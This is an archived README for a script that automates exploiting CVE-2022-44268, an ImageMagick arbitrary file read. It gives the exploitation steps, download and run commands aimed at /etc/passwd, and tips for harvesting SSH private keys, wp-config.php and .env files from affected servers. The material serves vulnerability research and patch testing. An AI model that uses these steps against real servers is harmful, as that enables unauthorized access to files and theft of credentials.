Associated Vulnerability
Title:ImageMagick 安全漏洞 (CVE-2022-44268)Description:ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary. file (if the magick binary has permissions to read it).
Description
Automating Exploitation of CVE-2022-44268 ImageMagick Arbitrary File Read
Readme
# auto-cve-2022-44268
Automating exploitation of CVE-2022-44268 ImageMagick Arbitrary File Read
Original finding: https://www.metabaseq.com/imagemagick-zero-days/
PoC Repository: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
# Description
ImageMagick will **interpret** the "profile" text string** as a filename** and **will load the content** as a raw profile, then **the attacker can download** the resized image **which will come with the content of a remote file.**
## Vulnerability & Exploitation summary
🔴 Take a PNG file, add a file path to the "profile" EXIF field, send it to a website using an affected version of ImageMagick, it interprets the file path, load its content into the EXIF field, you download the image, extract the HEX data in the "Raw Profile Type" field, and convert it to ASCII to read the remote file.
Affected versions: ImageMagick 7.1.0-49
# Requirements
```bash
sudo apt install pngcrush imagemagick exiftool exiv2 -y
```
# Usage
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/auto-cve-2022-44268.sh
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/flag.png
chmod +x auto-cve-2022-44268.sh
./auto-cve-2022-44268.sh <image name> <file to read>
# Example
./auto-cve-2022-44268.sh flag.png /etc/passwd
# Demo
https://github.com/narekkay/autoexploit-cve-2022-44268/assets/24856100/cd5719e5-6eae-4544-b4dc-719b1182018d
# Enumeration Tips
Once you get users from /etc/passwd, try to enumerate SSH private keys from /home/.ssh/<user>/ :
- id_rsa
- id_ecdsa
- id_ed25519
e.g /home/john/.ssh/id_ed25519
Don't forget :
- config files for known CMS like wp-config.php for Wordpress
- Virtual Hosts enumeration like /etc/apache2/sites-available/000-default.conf,
- or .env files for instances
### Tags
imagemagick, exploit, vuln, magick convert, magick resize, exploitation, vulnerabilities, file read, CVE-2022-44268
File Snapshot
[4.0K] /data/pocs/7f802fbbccf5ae457c451319e2887bcd89636c69
├── [1.6K] auto-cve-2022-44268.sh
├── [101K] banner.png
├── [5.5M] demo_auto-cve-2022-44268.mp4
├── [1.2K] flag.png
└── [2.0K] README.md
0 directories, 5 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →